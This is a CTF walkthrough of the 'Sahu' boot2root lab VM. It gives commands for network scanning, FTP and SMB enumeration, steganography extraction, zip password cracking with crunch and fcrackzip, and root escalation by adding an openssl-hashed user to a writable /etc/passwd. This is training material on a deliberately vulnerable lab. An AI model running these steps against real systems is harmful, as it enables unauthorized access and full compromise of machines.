Today we are going to complete a
boot2root challenge of the lab Sahu. The lab is developed by Vivek Gautam and
can be downloaded from here. Lab us
fairly for the beginners and helps to get familiar with the concept of CTF
challenges. It also helps to develop your enumeration skills as it solely
focuses on enumeration.
Penetration Testing
Methodology
·
Network Scanning
o
Netdiscover
scan
o
Nmap
scan
·
Enumeration
o Browsing HTTP service at port 80
o Directory Bruteforce using dirb
o Enumerating Source Code
o Directory Generation using Crunch
o Bruteforce Zip Password using
fcrackzip
·
Exploitation
o Connecting to Target using SMB
o Enumerating SMB
·
Post Exploitation
o
Running
LinEnum script
·
Privilege Escalation
o Writable /etc/password file
o Generating Password Hash using
Openssl
o Appending hash to /etc/passwd
o Getting Root Privileges
·
Reading Root Flag
The first stage in starting the
challenge is knowing your target and for that following command will be used :
netdiscover
After that we will start active
reconnaissance by scanning our target IP using nmap with the following command
:
nmap -p- -A 192.168.1.105
With nmap, as it can be seen in the
image above, open ports are shown. These ports are 21, 22, 80, 139, 445 with
the services of FTP, SSH, HTTP, netbios-ssn samba. Because of banner grabbing,
it was observed that anonymous login was enabled in FTP. Therefore, try to log
in from FTP with folowing commands :
ftp 192.168.1.105
Here, enter the password anonymous.
Once you are logged in from FTP use the ls command to check the contents it
has. Single zip file was found here, namely ftp.zip.
When opened, it asked for password
but as the password is not known we moved further. Open the IP address in
browser and the can he webpage as shown in the following :
Now we enumerated the directories
with directory buster using the command :
dirb http://192.168.1.105
As a result, we found a directory
/H/A/R/, if you remembered that the image on the web-page was of harayana so we
can correctly assume that the full directory will be /H/A/R/Y/A/N/A/ and when
opened in browser you can see the following :
In the source code, there will be a
phrase saying “try to extract with hurry”. Now this is something useful.
We had found an image on web page and
we have the hint in the source code. So we will used steghide to extract any
metadata and to do so, use the following command :
steghide extract -sf Haryana-1-1.jpg
And when asked enter the word hurry
and as you can see in the image below we found a file and when read it said, “I
have found the password for a zip file but I have forgot the last part of it,
can you find out. 5AHU**”
Now, according to the hint it means
that first four characters of password are 5AHU and password is of six
characters in length and we must find last two characters in order to get the
password. We can easily do this using crunch and construct a dictionary to fuzz
up the password. The last to characters could be of any combination i.e. it can
be alpha-numeric or special character and so on, therefore, use the following
set of command to make a dictionary using crunch of every possible combination:
crunch 6 6 -t 5AHU@, > dict.txt
crunch 6 v6 -t 5AHU@% >>
dict.txt
crunch 6 6 -t 5AHU@^ >>
dict.txt
crunch 6 6 -t 5AHU,% >>
dict.txt
crunch 6 6 -t 5AHU%^ >>
dict.txt
crunch 6 6 -t 5AHU^@ >>
dict.txt
crunch 6 6 -t 5AHU^% >>
dict.txt
Once the our wordlist for dictionary
attack is created we can commence our attack using fcrackzip and for that use
the following command :
fcrackzip -D -p dict.txt ftp.zip -v
The password has been cracked using
the above method and retrieved a ftp.txt file in which a username and password
is found.
Thus, it is clear that a connection
through sambashare can be made using smbclient and so to do the same, following
command will be used :
smbclient //192.168.1.105/sambashare
-U sahu
and when asked provide the password
which was retrieved from ftp.txt.
Now, connecting through smbclient
gave us an opportutnity to traverse around which lead us to find ssh.txt. upon
reading ssh.txt file revealed a username and password. As the username and
password is found in ssh.txt it can safely be assumed that these are the
credentials for SSH login. Let’s try to login through SSH, using the following
command :
ssh haryana@192.168.1.105
Further, provide the password when
asked and log in through SSH will be successful. After logging in the machine,
we decided to use the wget command to transfer the LinEnum script to the Target
Machine. Followed by the transfer, we gave the proper permissions to the script
and then run it.
As a result, we found that
/etc/passwd file is writable which allows us to make a new user and alter it’s
permissions as per our desires.
To make a new user, use the following
command :
openssl passwd -1 -salt raj pass123
Now we have the hash, all we need is
to append this user hash in the target machine.
On the target machine, we use the
echo command to add this user into the /etc/passwd file. We can verify that the
user has successfully been added by taking a look at the /etc/passwd using the
tail command. Now that we have added user, let’s login to that user using the
su command. As the user we created had root privileges so we own the root on
this machine.
0 comments:
Post a Comment